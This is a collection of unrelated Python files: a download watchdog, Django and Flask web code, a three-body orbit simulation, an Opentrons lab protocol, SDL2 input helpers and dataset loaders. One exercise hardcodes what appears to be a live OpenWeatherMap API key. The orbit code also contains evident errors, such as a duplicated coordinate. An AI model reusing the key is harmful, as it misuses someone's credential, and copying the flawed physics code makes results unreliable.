self.last_file_size = 0.0
self.flag = Event()
def terminate(self):
if self.numc == 0:
logger.error("ChildrenProcess doesn't exist")
else:
for process in self.children:
process.terminate()
# logger.info('下载卡死' + self.file_name)
def get_process(self, parent_pid):
try:
parent = psutil.Process(parent_pid)
except psutil.NoSuchProcess:
self.stop()
return logger.error("Process doesn't exist")
children = parent.children(recursive=True)
numc = len(children)
return parent, children, numc
def kill_child_processes(self):
if self.flag.is_set():
self.stop()
return
file_size = os.path.getsize(self.file_name) / 1024 / 1024 / 1024
if file_size <= self.last_file_size:
logger.error('下载卡死' + self.file_name)
if self.numc == 0:
self.parent.terminate()
else:
self.terminate()
time.sleep(1)
if os.path.isfile(self.file_name):
return logger.info('卡死下载进程可能未成功退出')
else:
self.stop()
return logger.info('卡死下载进程成功退出')
self.last_file_size = file_size
if file_size >= 2.5:
self.flag.set()
self.terminate()
logger.info('分段下载' + self.file_name)
def __timer(self):
logger.debug('获取到{0},{1}'.format(self.parent_pid, self.file_name))
retry = 0
while not self._flag.wait(self.interval):
self.parent, self.children, self.numc = self.get_process(self.parent_pid)
if os.path.isfile(self.file_name):
self._func(*self._args, **self._kwargs)
else:
logger.info('%s不存在' % self.file_name)
if retry >= 2:
self.terminate()
return logger.info('结束进程,找不到%s' % self.file_name)
retry += 1
# logger.info('监控<%s>线程退出' % self.file_name)
def run(self):
try:
self.__timer()
finally:
logger.debug('退出监控<%s>线程' % self.file_name)
def match1(text, *patterns):
if len(patterns) == 1:
pattern = patterns[0]
match = re.search(pattern, text)
if match:
return match.group(1)
else:
return None
else:
ret = []
for pattern in patterns:
match = re.search(pattern, text)
if match:
ret.append(match.group(1))
return ret
|
year = int(input("Input year: "))
if year > 0:
day = 365
if year % 4 == 0:
day = 366
if year % 100 ==0:
day = 365
if year % 400 ==0:
day = 366
print("Days number = ", day)
else:
print("Sorry but you input negative year")
|
class GoogleCampaignMiddleware:
"""This middleware captures the various utm* querystring pararmeters and saves them in session."""
UTM_CODES = ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content']
def __init__(self, get_response):
self.get_response = get_response
def __call__(self, request):
if not request.session.get('utm'):
request.session['utm'] = {}
if request.GET.get('utm_source'):
utm = {}
for code in self.UTM_CODES:
value = request.GET.get(code)
if value:
utm[code] = value
request.session['utm'] = utm
# store utm codes on the request object, so they're available in templates
request.utm = request.session['utm']
response = self.get_response(request)
return response
|
# -*- coding: utf-8 -*-
"""
Created on Tue Dec 10 14:41:51 2019
@author: AARADHYA JAIN
"""
dict1 = {1:[1],2:1,3:[3,4]}
new_list = list(filter(lambda x:(isinstance(x,list)), dict1.values()))
print(len(new_list)) |
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import math
data=pd.read_csv('headbrain.csv')
x=data.iloc[:,2].values
y=data.iloc[:,3].values
xMean=np.mean(x)
yMean=np.mean(y)
upper=0
lower=0
for i in range(0,len(x)):
upper=upper+((x[i]-xMean)*(y[i]-yMean))
lower=lower+((x[i]-xMean)**2)
bDash=upper/lower
print(bDash)
bNot=yMean-(bDash*xMean)
print(bNot)
x1=data.iloc[:,2:3].values
#from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
regressor=LinearRegression()
regressor.fit(x1,y) #this is used to train the machine
m=regressor.coef_
c=regressor.intercept_
print(m)
print(c)
#print(regressor.score(x1,y)) |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.6 on 2017-10-30 04:44
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('patients', '0002_auto_20171029_2353'),
]
operations = [
migrations.AddField(
model_name='patientprofile',
name='age',
field=models.CharField(default='20', max_length=3),
preserve_default=False,
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Sat Sep 26 17:54:31 2020
@author: Alex Lee
"""
import numpy as np
import matplotlib.pyplot as plt
from scipy.integrate import solve_ivp
from scipy.integrate import odeint
from scipy.signal import argrelextrema
G = 6.67430e-11
Msun = 1988500e24 #kg
mearth = 5.97219e24 #kg
mjup = 1898.13e24
au = 149597870700 #m
aupday = 149597870700/24/60/60 #m/s
xs = -5.871476350881860E-03*au
ys = 6.579099261042989E-03*au
zs = 8.190722904306934E-05*au ## z
rsun0 = np.array([xs, ys, ys])
vxs = -7.499359804658616E-06*aupday ## x
vys = -4.805753079522615E-06*aupday ## y
vzs = 2.213656602068544E-07*aupday ## z
vsun0 = np.array([vxs, vys, vzs])
xe = 9.886566130496588E-01*au
ye = -1.445653650721954E-01*au
ze = 8.438508460440852E-05*au
re0 = np.array([xe, ye, ze])
vxe = 2.302725583407780E-03*aupday
vye = 1.694428848894045E-02*aupday
vze = -1.042608823204765E-06*aupday
ve0 = np.array([vxe, vye, vze])
xj = 2.347699840428325E+00*au
yj = -4.555746878516208E+00*au
zj = -3.362641503393212E-02*au
rj0 = np.array([xj, yj, zj])
vxj = 6.615387200421259E-03*aupday
vyj = 3.815156141796302E-03*aupday
vzj = -1.637910576358818E-04*aupday
vj0 = np.array([vxj, vyj, vzj])
#Update CM
r_cm0 = (Msun*rsun0 + mjup*rj0 + mearth*re0)/(Msun+mearth+mjup)
v_cm0 = (Msun*vsun0 + mjup*vj0 + mearth*ve0)/(Msun+mearth+mjup)
def ThreeBodyEquations(w,t):
r1=w[:3]
r2=w[3:6]
r3=w[6:9]
v1=w[9:12]
v2=w[12:15]
v3=w[15:18]
r12=np.linalg.norm(r2-r1)
r13=np.linalg.norm(r3-r1)
r23=np.linalg.norm(r3-r2)
dv1bydt= G*mearth*(r2-r1)/r12**3 + G*mjup*(r3-r1)/r13**3
dv2bydt= G*Msun*(r1-r2)/r12**3 + G*mjup*(r3-r2)/r23**3
dv3bydt= G*Msun*(r1-r3)/r13**3 + G*mearth*(r2-r3)/r23**3
dr1bydt= v1
dr2bydt= v2
dr3bydt= v3
r12_derivs = np.concatenate((dr1bydt,dr2bydt))
r_derivs = np.concatenate((r12_derivs,dr3bydt))
v12_derivs = np.concatenate((dv1bydt,dv2bydt))
v_derivs = np.concatenate((v12_derivs,dv3bydt))
derivs = np.concatenate((r_derivs,v_derivs))
return derivs
init_params=np.array([rsun0,re0,rj0,vsun0,ve0,vj0]) #Initial parameters
init_params=init_params.flatten()
sec = 1
minu = 60*sec
hour = 60*minu
day = 24*hour
year = 365.242199*day
tyear = 100 ## which is reaching my computer's limit.
T = tyear*year
nsteps0= 2*hour
t = np.linspace(0, T, int(T/nsteps0))
three_body_sol=odeint(ThreeBodyEquations, init_params,t )
rsun = three_body_sol[:,:3]
rearth = three_body_sol[:,3:6]
rjup = three_body_sol[:,6:9]
vsun = three_body_sol[:, 9:12]
vearth = three_body_sol[:,12:15]
vjup = three_body_sol[:,15:18]
r_cm=(Msun*rsun + mjup*rjup + mearth*rearth)/(Msun+mearth+mjup)
v_cm=(Msun*vsun + vjup*vj0 + vearth*ve0)/(Msun+mearth+mjup)
re_cm = rearth-r_cm
rs_cm = rsun-r_cm
rj_cm = rjup-r_cm
ve_cm = vearth - v_cm
vs_cm = vsun - v_cm
vj_cm = vjup - v_cm
re_mag = np.linalg.norm(re_cm, axis=1)
days = t/day
plt.plot(days, re_mag)
plt.xlim(0, 365*10)
aphelion = argrelextrema(re_mag, np.greater)
plt.scatter(days[aphelion], re_mag[aphelion], label = 'Aphelion')
perihelion = argrelextrema(-re_mag, np.greater)
plt.scatter(days[perihelion], re_mag[perihelion], label = 'Perihelion')
plt.xlabel('Day after 2020 Sept 14 ')
plt.ylabel('Distance to the sun [m] ')
plt.title('Distance change in 10 years example')
plt.legend()
plt.figure()
plt.plot(days[aphelion], re_mag[aphelion], label = 'Aphelion')
plt.plot(days[perihelion], re_mag[perihelion], label = 'Perihelion')
plt.xlabel('Days after 2020 Sept 14 ')
plt.ylabel('Distance to the sun [m] ')
plt.legend()
perihelion = np.array(perihelion)[0]
aphelion = np.array(aphelion)[0]
perihelion = perihelion[0: len(aphelion)]
eccen = (re_mag[aphelion] - re_mag[perihelion])/ (re_mag[aphelion] + re_mag[perihelion])
eyear = np.linspace(1, len(eccen), len(eccen))
plt.figure()
plt.title('Days between aphelions and aphelion')
years = np.linspace(1, len(aphelion)-1, len(aphelion)-1)
plt.scatter(years,days[aphelion[1: len(aphelion)]]- days[aphelion[0: len(aphelion)-1]], label = 'Aphelion' , marker= '*')
plt.scatter(years,days[perihelion[1: len(perihelion)]]- days[perihelion[0: len(perihelion)-1]] , label = 'Perihelion', marker = '.')
plt.xlabel('Year after 2020')
plt.ylabel('Days of a year base on the aphelions difference')
plt.legend()
plt.figure()
plt.plot(eyear, eccen)
title = 'Eccentricity change in '+ str(tyear) + ' years'
plt.title(title)
plt.xlabel('Year after 2020')
plt.ylabel('Eccentricity ')
plt.figure()
plt.plot(re_cm[:, 0],re_cm[:, 1])
plt.plot(rs_cm[:, 0],rs_cm[:, 1], marker='o')
plt.plot(rj_cm[:, 0],rj_cm[:, 1])
|
"""Functions for simulating various SDL2 input events."""
import sdl2
from ctypes import byref
# Helper functions
def _mousebutton_flag(button):
buttons = {
'left': sdl2.SDL_BUTTON_LEFT,
'right': sdl2.SDL_BUTTON_RIGHT,
'middle': sdl2.SDL_BUTTON_MIDDLE
}
if not button in buttons.keys():
raise ValueError("'{0}' is not a valid mouse button.".format(str(key)))
return buttons[button]
def _keysym_attrs(key, mod=None):
if type(key) is str:
keycode = sdl2.SDL_GetKeyFromName(key.encode('utf8'))
if keycode == 0:
raise ValueError("'{0}' is not a recognized key name.".format(key))
else:
keycode = key
mods = {
'ctrl': sdl2.KMOD_CTRL, 'shift': sdl2.KMOD_SHIFT,
'alt': sdl2.KMOD_ALT, 'meta': sdl2.KMOD_GUI
}
if mod:
if type(mod) is str and mod in mods.keys():
modval = mods[mod]
elif type(mod) is int:
modval = mod
else:
raise ValueError("'mod' must be a string or int.")
else:
modval = 0
return (keycode, modval)
# SDL_Event simulation functions
def keydown(key, mod = None):
keycode, modval = _keysym_attrs(key, mod)
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYDOWN
e.key.type = sdl2.SDL_KEYDOWN
e.key.keysym.sym = keycode
e.key.keysym.mod = modval
return e
def keyup(key, mod = None):
keycode, modval = _keysym_attrs(key, mod)
e = sdl2.SDL_Event()
e.type = sdl2.SDL_KEYUP
e.key.type = sdl2.SDL_KEYUP
e.key.keysym.sym = keycode
e.key.keysym.mod = modval
return e
def click(button = 'right', loc = (0, 0), release = False):
etype = sdl2.SDL_MOUSEBUTTONUP if release else sdl2.SDL_MOUSEBUTTONDOWN
e = sdl2.SDL_Event()
e.type = etype
e.button.type = etype
e.button.x, e.button.y = loc
e.button.button = _mousebutton_flag(button)
return e
def textinput(char):
e = sdl2.SDL_Event()
e.type = sdl2.SDL_TEXTINPUT
e.text.type = sdl2.SDL_TEXTINPUT
e.text.text = char.encode('utf-8')
return e
def queue_event(e):
ret = sdl2.SDL_PushEvent(byref(e))
if ret != 1:
raise ValueError("Unable to add event to queue.")
|
#PB Reaction and purification Protocol 8/9
#last update: October 30, 2020
#Seqwell Workflow
import math
from opentrons import types
metadata = {
'protocolName': 'SeqWell - Pooled Barcoding and Purification',
'author': 'Chaz <chaz@opentrons.com>',
'source': 'Custom Protocol Request',
'apiLevel': '2.3'
}
NUM_POOL = 16 # this should be between 1 and 16
def run(protocol):
# load labware, modules, and pipettes
tips20 = [protocol.load_labware(
'opentrons_96_filtertiprack_20ul', s) for s in ['5', '10']]
tips200 = [protocol.load_labware(
'opentrons_96_filtertiprack_200ul', s) for s in [
'7', '8', '9', '11']]
p20 = protocol.load_instrument(
'p20_single_gen2', 'right', tip_racks=tips20)
m300 = protocol.load_instrument(
'p300_multi_gen2', 'left', tip_racks=tips200)
tempdeck = protocol.load_module('temperature module gen2', '4')
magdeck = protocol.load_module('magnetic module gen2', '6')
pcr_strips = protocol.load_labware(
'opentrons_96_aluminumblock_generic_pcr_strip_200ul',
# 'nest_96_wellplate_100ul_pcr_full_skirt',
'1', 'PCR Strips')
thermo_strips = protocol.load_labware(
'opentrons_96_aluminumblock_generic_pcr_strip_200ul',
# 'nest_96_wellplate_100ul_pcr_full_skirt',
'2', 'Thermocycler + Destination Strips')
al_block24 = tempdeck.load_labware(
'opentrons_24_aluminumblock_nest_0.5ml_screwcap', 'PB Reagents')
# 'opentrons_24_aluminumblock_nest_1.5ml_snapcap', 'PB Reagents')
deep_plate = magdeck.load_labware('nest_96_wellplate_2ml_deep')
reservoir = protocol.load_labware('usascientific_12_reservoir_22ml', '3')
if NUM_POOL < 1 or NUM_POOL > 16:
raise Exception('Number of Pools must be between 1 and 16.')
num_col = math.ceil(NUM_POOL/8)
tempdeck.set_temperature(4)
p20.flow_rate.aspirate = 7.6
p20.flow_rate.dispense = 7.6
p20.flow_rate.blow_out = 100
m300.flow_rate.aspirate = 100
m300.flow_rate.dispense = 200
m300.flow_rate.blow_out = 500
"""
~~~ 5. Pool Barcoding (PB) Reaction Setup ~~~
"""
protocol.comment('Beginning Step 5. Pool Barcoding Reaction Setup...')
# Add 5ul of PB Reagent to each SB tube
pb_reagents = al_block24.wells()[:NUM_POOL]
init_sb = pcr_strips.wells()[80:80+NUM_POOL]
protocol.comment('Adding 5uL of PB reagent to each SB tube.')
for pb, dest in zip(pb_reagents, init_sb):
p20.pick_up_tip()
p20.aspirate(5, pb)
p20.touch_tip()
p20.air_gap(3)
p20.dispense(8, dest)
p20.mix(5, 20, dest)
p20.touch_tip()
p20.blow_out()
p20.drop_tip()
# Add 22ul of Coding Buffer to PCR tube containing SB pool
coding_buffer = pcr_strips['A1']
init_row = pcr_strips.rows()[0][10:10+num_col]
protocol.comment('Adding 22uL of Coding Buffer to each SB tube.')
for sb in init_row:
m300.pick_up_tip()
m300.flow_rate.aspirate = 25
m300.flow_rate.dispense = 50
m300.aspirate(22, coding_buffer)
m300.air_gap(10)
m300.dispense(32, sb)
m300.mix(2, 60, sb)
m300.flow_rate.aspirate = 100
m300.flow_rate.dispense = 200
m300.blow_out()
m300.drop_tip()
protocol.pause('Step 5 complete. Please cap PCR tubes containing PB \
reaction and run TAG program on thermal cycler. After TAG program, \
return strips to deck and click RESUME to begin Step 6.')
"""
~~~ 6. PB Reaction Stop ~~~
"""
protocol.comment('Beginning Step 6. PB Reaction Stop...')
# Add 31uL of X solution to each PB Reaction
x_solution = [pcr_strips[pos] for pos in ['A2', 'A3']]
pb_react = [
[thermo_strips['A1'], thermo_strips['A2']],
[thermo_strips['A3'], thermo_strips['A4']]
][:num_col]
protocol.comment('Splitting up sample.')
for src, dest in zip(init_row, pb_react):
m300.pick_up_tip()
m300.aspirate(66, src)
for d in dest:
m300.dispense(33, d)
m300.blow_out()
m300.drop_tip()
protocol.comment('Adding 31uL of X solution to each reaction tube.')
for x, pb_dest in zip(x_solution, pb_react):
for pb in pb_dest:
m300.pick_up_tip()
m300.aspirate(31, x)
m300.air_gap(10)
m300.dispense(41, pb)
m300.flow_rate.aspirate = 25
m300.flow_rate.dispense = 50
m300.mix(5, 50, pb)
m300.blow_out()
m300.drop_tip()
m300.flow_rate.aspirate = 100
m300.flow_rate.dispense = 200
protocol.pause('Step 6 complete. Please cap PCR tubes containging PB \
reaction and run STOP program on thermal cycler. After TAG program,\
return strips to deck and click RESUME to begin Step 7.')
"""
~~~ 7. PB Reaction Purification ~~~
"""
protocol.comment('Beginning Step 7. PB Reaction Purification...')
magwise = reservoir['A1']
etoh = reservoir['A2']
tris = reservoir['A3']
liq_waste = reservoir['A12']
side_vars = [-1, 1]
def deep_mix(reps, vol, loc, side):
"""Function for improved mixing of magbeads in deep well"""
loc1 = loc.bottom().move(types.Point(x=side, y=0, z=0.6))
alt_mix = side * -1
loc2 = loc.bottom().move(types.Point(x=alt_mix, y=0, z=1))
for _ in range(reps):
m300.aspirate(vol, loc1)
m300.dispense(vol, loc2)
def supernatant_removal(vol, loc, side):
"""Function for removal of supernatant"""
m300.flow_rate.aspirate = 20
extra_vol = 0
while vol > 200:
m300.aspirate(
180, loc.bottom().move(types.Point(x=side, y=0, z=0.5)))
m300.dispense(180, liq_waste.top(-3))
m300.aspirate(10, liq_waste.top())
vol -= 180
extra_vol += 10
m300.aspirate(
vol, loc.bottom().move(types.Point(x=side, y=0, z=0.5)))
m300.dispense(vol+extra_vol, liq_waste.top(-3))
m300.flow_rate.aspirate = 100
protocol.comment('Adding 99uL of MAGwise to deep well plate')
mag_samps = deep_plate.rows()[0][:num_col]
m300.pick_up_tip()
m300.mix(10, 200, magwise)
for m in mag_samps:
m300.aspirate(99, magwise)
m300.air_gap(10)
m300.dispense(109, m)
m300.blow_out()
m300.drop_tip()
protocol.comment('Adding PB reaction to deep well plate.')
for tube, samp, s in zip(pb_react, mag_samps, side_vars):
m300.pick_up_tip()
for t in tube:
m300.aspirate(64, t)
m300.air_gap(20)
m300.dispense(148, samp)
deep_mix(10, 180, samp, s)
m300.blow_out()
m300.drop_tip()
protocol.comment('Incubating to allow DNA to bind.')
protocol.delay(minutes=5)
protocol.comment('Engaging MagDeck')
magdeck.engage(height=13.7)
protocol.comment('Waiting for bead pellet to form.')
protocol.delay(minutes=3)
protocol.comment('Removing supernatant.')
for samp, s in zip(mag_samps, side_vars):
m300.pick_up_tip()
supernatant_removal(227, samp, s)
m300.drop_tip()
for idx in range(1, 3):
protocol.comment('Ethanol wash %d:' % idx)
protocol.comment('Adding 300ul of ethanol.')
for samp in mag_samps:
m300.pick_up_tip()
m300.flow_rate.dispense = 50
m300.aspirate(150, etoh)
m300.dispense(150, samp.bottom(5))
m300.aspirate(150, etoh)
m300.dispense(150, samp.bottom(5))
m300.drop_tip()
m300.flow_rate.dispense = 200
protocol.comment('Incubating for 30 seconds.')
protocol.delay(seconds=30)
protocol.comment('Removing supernatant.')
for samp, s in zip(mag_samps, side_vars):
m300.pick_up_tip()
supernatant_removal(320, samp, s)
m300.drop_tip()
protocol.comment('Adding 24uL of 10mM Tris to bead pellets.')
magdeck.disengage()
for samp, s in zip(mag_samps, side_vars):
m300.pick_up_tip()
m300.aspirate(24, tris)
m300.air_gap(10)
m300.dispense(34, samp)
deep_mix(10, 30, samp, s)
m300.blow_out()
m300.drop_tip()
protocol.comment('Incubating to allow DNA to elute.')
protocol.delay(minutes=5)
protocol.comment('Engaging MagDeck')
magdeck.engage(height=13.7)
protocol.comment('Waiting for bead pellet to form.')
protocol.delay(minutes=2)
final_tube = thermo_strips.rows()[0][10:10+num_col]
protocol.comment('Transferring elution to PCR tubes.')
m300.flow_rate.aspirate = 20
for src, dest, side in zip(mag_samps, final_tube, side_vars):
m300.pick_up_tip()
m300.aspirate(23, src.bottom().move(types.Point(x=side, y=0, z=0.5)))
m300.dispense(23, dest)
m300.blow_out()
m300.drop_tip()
protocol.comment('Protocol complete! Proceed immediately to next step \
(library amplification) or store purified PB reaction at -20C.')
|
#Practica 2 Laboratorio de Ciberseguridad
import requests
import json
output = []
def call(url):
r = requests.get(url)
return (json.loads(r.content))
output.append(call("https://api.openweathermap.org/data/2.5/weather?q=London&units=metric&appid=4c35b48c9218dc4d08cd6eede31f455d"))
output.append(call("https://api.openweathermap.org/data/2.5/weather?id=2172797&appid=4c35b48c9218dc4d08cd6eede31f455d"))
output.append(call("https://api.openweathermap.org/data/2.5/weather?lat=35&lon=139&appid=4c35b48c9218dc4d08cd6eede31f455d"))
with open("pract2.txt","w+") as txt:
for i in output:
txt.write(str(i)+"\n")
|
import datetime
from flask import render_template, request
from flask_login import current_user, login_required
from sqlalchemy import func
from scrobbler import app, db
from scrobbler.models import Scrobble
from scrobbler.webui.consts import PERIODS
from scrobbler.webui.helpers import range_to_datetime
from scrobbler.webui.views import blueprint
def get_chart_params(period):
period, days = PERIODS.get(period, PERIODS['1w'])
time_from = request.args.get('from')
time_to = request.args.get('to')
custom_range = False
count = int(request.args.get('count', app.config['RESULTS_COUNT']))
if time_from is None or time_to is None:
time_from = datetime.datetime.now() - datetime.timedelta(days=days)
time_to = datetime.datetime.now()
else:
time_from, time_to = range_to_datetime(time_from, time_to)
custom_range = True
return {
'period': period,
'days': days,
'time_from': time_from,
'time_to': time_to,
'custom_range': custom_range,
'count': count,
}
@blueprint.route("/top/artists/")
@blueprint.route("/top/artists/<period>/")
@login_required
def top_artists(period=None):
params = get_chart_params(period)
scrobbles = func.count(Scrobble.artist).label('count')
chart = (
db.session.query(Scrobble.artist, scrobbles)
.group_by(Scrobble.artist)
.filter(
Scrobble.user_id == current_user.id,
Scrobble.played_at >= params['time_from'],
Scrobble.played_at <= params['time_to'],
)
.order_by(scrobbles.desc())
.limit(params['count'])
.all()
)
return render_template(
'charts/top_artists.html',
chart=enumerate(chart, start=1),
max_count=chart[0][1] if chart else 0,
**params
)
@blueprint.route("/top/tracks/")
@blueprint.route("/top/tracks/<period>/")
@login_required
def top_tracks(period=None):
params = get_chart_params(period)
scrobbles = func.count(Scrobble.artist).label('count')
chart = (
db.session.query(Scrobble.artist, Scrobble.track, scrobbles)
.group_by(Scrobble.artist, Scrobble.track, Scrobble.user_id == current_user.id)
.filter(
Scrobble.user_id == current_user.id,
Scrobble.played_at >= params['time_from'],
Scrobble.played_at <= params['time_to'],
)
.order_by(scrobbles.desc())
.limit(params['count'])
.all()
)
return render_template(
'charts/top_tracks.html',
chart=enumerate(chart, start=1),
max_count=chart[0][2] if chart else 0,
**params
)
@blueprint.route("/top/yearly/tracks/")
@login_required
def top_yearly_tracks():
scrobbles = func.count(Scrobble.artist).label('count')
charts = {}
col_year = func.extract('year', Scrobble.played_at)
year_from, year_to = (
db.session.query(func.min(col_year), func.max(col_year))
.filter(Scrobble.user_id == current_user.id)
.first()
)
stat_count = 10000
show_count = 100
if not year_from or not year_to:
return render_template(
'charts/top_yearly_tracks.html',
charts={},
position_changes={},
show_count=show_count,
)
year_from, year_to = int(year_from), int(year_to)
for year in range(year_from, year_to + 1):
time_from = datetime.datetime(year, 1, 1)
time_to = datetime.datetime(year, 12, 31, 23, 59, 59, 999999)
charts[year] = (
db.session.query(Scrobble.artist, Scrobble.track, scrobbles)
.filter(
Scrobble.user_id == current_user.id,
Scrobble.played_at >= time_from,
Scrobble.played_at <= time_to
)
.group_by(Scrobble.artist, Scrobble.track)
.order_by(scrobbles.desc())
.limit(stat_count)
.all()
)
position_changes = {}
for year in range(year_from + 1, year_to + 1):
chart = {
'{} – {}'.format(artist, track): position
for position, (artist, track, scrobbles) in enumerate(charts[year], 1)
}
prev_chart = {
'{} – {}'.format(artist, track): position
for position, (artist, track, scrobbles) in enumerate(charts[year - 1], 1)
}
prev_charts = (
chart for chart_year, chart in charts.items() if chart_year < year
)
prev_tracks = {
'{} – {}'.format(artist, track)
for chart in prev_charts
for (artist, track, scrobbles) in chart
}
if year not in position_changes:
position_changes[year] = {}
for title in chart:
if title in prev_chart:
position_changes[year][title] = prev_chart[title] - chart[title]
elif title not in prev_tracks:
position_changes[year][title] = 'new'
charts = sorted(charts.items())
return render_template(
'charts/top_yearly_tracks.html',
charts=charts,
position_changes=position_changes,
show_count=show_count,
)
@blueprint.route("/top/yearly/artists/")
@login_required
def top_yearly_artists():
scrobbles = func.count(Scrobble.artist).label('count')
charts = {}
col_year = func.extract('year', Scrobble.played_at)
year_from, year_to = (
db.session.query(func.min(col_year), func.max(col_year))
.filter(Scrobble.user_id == current_user.id)
.first()
)
stat_count = 1000
show_count = 100
if not year_from or not year_to:
return render_template(
'charts/top_yearly_artists.html',
charts={},
position_changes={},
show_count=show_count,
)
year_from, year_to = int(year_from), int(year_to)
for year in range(year_from, year_to + 1):
time_from = datetime.datetime(year, 1, 1)
time_to = datetime.datetime(year, 12, 31, 23, 59, 59, 999999)
charts[year] = (
db.session.query(Scrobble.artist, scrobbles)
.filter(
Scrobble.user_id == current_user.id,
Scrobble.played_at >= time_from,
Scrobble.played_at <= time_to
)
.group_by(Scrobble.artist)
.order_by(scrobbles.desc())
.limit(stat_count)
.all()
)
position_changes = {}
for year in range(year_from + 1, year_to + 1):
chart = {artist: position for position, (artist, scrobbles) in enumerate(charts[year], 1)}
prev_chart = {
artist: position for position, (artist, scrobbles) in enumerate(charts[year - 1], 1)
}
prev_charts = (chart for chart_year, chart in charts.items() if chart_year < year)
prev_artists = {artist for chart in prev_charts for (artist, scrobbles) in chart}
if year not in position_changes:
position_changes[year] = {}
for artist, data in chart.items():
if artist in prev_chart:
position_changes[year][artist] = prev_chart[artist] - chart[artist]
elif artist not in prev_artists:
position_changes[year][artist] = 'new'
charts = sorted(charts.items())
return render_template(
'charts/top_yearly_artists.html',
charts=charts,
position_changes=position_changes,
show_count=show_count,
)
|
from django.apps import AppConfig
class GithubAuthConfig(AppConfig):
name = "apps.github_auth"
|
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from django.core import serializers
from app1.models import *
import json
import datetime
from app1.comm.utils import *
def addTeachPlans(request):
try:
if(request.method=='POST'):
resdata=json.loads(request.body)
data=resdata["data"]
co=data["cid"]
gr=data["gra"]
cr=data["cri"]
tedate=data["teadate"]
check=data["checktype"]
kco=Course.objects.get(cno=co)
kgr=Grade.objects.get(gno=gr)
result=TeachPlan()
result.course=kco
result.grade=kgr
result.credit=cr
result.teach_date=tedate
result.checkType=check
result.save()
result=TeachPlan.objects.all().values()
return showJsonresult(result)
except Exception as e:
response={}
response['msg']=str(e)
response['err_num']=1
return showJsonerror(response)
def showTeachPlans(request):
result=TeachPlan.objects.all().values()
return showJsonresult(result)
def updateTeachPlan(request):
try:
if(request.method=='POST'):
resdata=json.loads(request.body)
data=resdata["data"]
co=data["cid"]
gr=data["gra"]
cr=data["cri"]
tedate=data["teadate"]
check=data["checktype"]
kk=TeachPlan.objects.filter(course=co).filter(grade=gr).delete()
kco=Course.objects.get(cno=co)
kgr=Grade.objects.get(gno=gr)
result=TeachPlan()
result.course=kco
result.grade=kgr
result.credit=cr
result.teach_date=tedate
result.checkType=check
result.save()
result=TeachPlan.objects.values().all()
return showJsonresult(result)
except Exception as e:
response={}
response['msg']=str(e)
response['err_num']=1
return showJsonerror(response)
def delTeachPlan(request):
try:
if(request.method=='POST'):
resdata=json.loads(request.body)
data=resdata["data"]
co=data["cid"]
gr=data["gra"]
kco=Course.objects.get(cno=co)
kgr=Grade.objects.get(gno=gr)
result=Course.objects.filter(cno=co).delete()
return showJsonresult(result)
except Exception as e:
response={}
response['msg']=str(e)
response['err_num']=1
return showJsonerror(response) |
import sys
sys.path.append('..')
import numpy as np
import os
from time import time
from collections import Counter
import random
from matplotlib import pyplot as plt
import pickle
from lib.data_utils import shuffle
def mnist():
data_dir = os.path.join(os.environ["DATADIR"], "mnist")
fd = open(os.path.join(data_dir,'train-images.idx3-ubyte'))
loaded = np.fromfile(file=fd,dtype=np.uint8)
trX = loaded[16:].reshape((60000,28*28))
fd = open(os.path.join(data_dir,'train-labels.idx1-ubyte'))
loaded = np.fromfile(file=fd,dtype=np.uint8)
trY = loaded[8:].reshape((60000))
fd = open(os.path.join(data_dir,'t10k-images.idx3-ubyte'))
loaded = np.fromfile(file=fd,dtype=np.uint8)
teX = loaded[16:].reshape((10000,28*28))
fd = open(os.path.join(data_dir,'t10k-labels.idx1-ubyte'))
loaded = np.fromfile(file=fd,dtype=np.uint8)
teY = loaded[8:].reshape((10000))
trY = np.asarray(trY)
teY = np.asarray(teY)
return trX, teX, trY, teY
def mnist_with_valid_set():
trX, teX, trY, teY = mnist()
trX, trY = shuffle(trX, trY)
vaX = trX[50000:]
vaY = trY[50000:]
trX = trX[:50000]
trY = trY[:50000]
return trX, vaX, teX, trY, vaY, teY
def cifar():
data_dir = os.path.join(os.environ["DATADIR"], "cifar/cifar-10-batches-py")
def process_batch(fn):
fo = open(fn, 'rb')
data_dict = pickle.load(fo, encoding="latin1")
fo.close()
raw = data_dict["data"]
images = raw.reshape((-1, 3, 32, 32))
return images, np.array(data_dict["labels"], dtype=np.int32)
trX, trY = [], []
for i in range(1, 6):
batch_name = os.path.join(data_dir, "data_batch_%d" % i)
print(batch_name)
images, labels = process_batch(batch_name)
trX.append(images)
trY.append(labels)
trX = np.concatenate(trX)
trY = np.concatenate(trY)
teX, teY = process_batch(os.path.join(data_dir, "test_batch"))
return trX, teX, trY, teY
def cifar3():
data_dir = os.path.join(os.environ["DATADIR"], "cifar3/cifar-10-batches-py")
def process_batch(fn):
fo = open(fn, 'rb')
data_dict = pickle.load(fo)
fo.close()
raw = data_dict["data"]
images = raw.reshape((-1, 3, 32, 32))
return images, np.array(data_dict["labels"], dtype=np.int32)
trX, trY = [], []
for i in range(1, 6):
batch_name = os.path.join(data_dir, "data_batch_%d" % i)
print(batch_name)
images, labels = process_batch(batch_name)
trX.append(images)
trY.append(labels)
trX = np.concatenate(trX)
trY = np.concatenate(trY)
teX, teY = process_batch(os.path.join(data_dir, "test_batch"))
return trX, teX, trY, teY
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 27 2020
@author: Palash Sashittal
"""
import pysam
import pandas as pd
import numpy as np
import sys
import argparse
from typing import List, Dict, Tuple, Optional
from collections import Counter
import math
import itertools
#from jumper.segment_graph_aux import *
from splice_graph_aux import *
class solution():
def __init__(self, graph, fname, matching_fname=None):
self.graph = graph
self.paths = []
self.path_abundances = []
self.path_indices = []
flag = False
with open(fname, 'r') as inp:
for line in inp:
if line.startswith('>transcript'):
if flag:
assert(self.graph.getPathIndex(path) == pathIndex)
self.paths.append(tuple(path))
self.path_abundances.append(pathAbundance)
self.path_indices.append(pathIndex)
path = []
pathIndex = int(line.rstrip(
'\n').split('\t')[0].split('_')[1])
pathAbundance = float(line.rstrip('\n').split(':')[1])
# print(f"transcript {pathIndex} is drawn")
self.paths.append(tuple(self.graph.transcripts[pathIndex]))
self.path_abundances.append(pathAbundance)
self.path_indices.append(pathIndex)
flag = False
